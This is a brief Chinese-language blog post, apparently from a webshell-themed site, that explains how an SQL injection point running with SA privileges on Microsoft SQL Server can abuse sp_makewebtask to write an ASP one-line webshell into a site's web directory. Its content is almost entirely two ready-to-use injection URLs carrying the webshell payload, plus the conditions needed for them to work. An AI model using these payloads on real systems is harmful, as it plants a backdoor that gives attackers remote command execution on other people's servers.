SA权限用sp_makewebtask直接在web目录里写入一句话

分类:安全 | 2011-08-17 | 撸过 128 次
0人扯谈

示范:

http://127.0.0.1/XXXasp?id=3389′;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20”<%25execute(request(“a”))%25>”%20′;–
前提是注入点是sa权限

用sp_makewebtask直接在web目录里写入一句话马:
条件是要sa权限和站点的web路径:

http://127.0.0.1/xxx.asp?id=123′;exec%20sp_makewebtask%20’d:\www\xxx\xxx.asp’,’%20select%20”<%25execute(request(“cn”))%25>”%20′;–

 

本站内容均为原创,转载请务必保留署名与链接!
SA权限用sp_makewebtask直接在web目录里写入一句话:https://www.webshell.cc/447.html

随机日志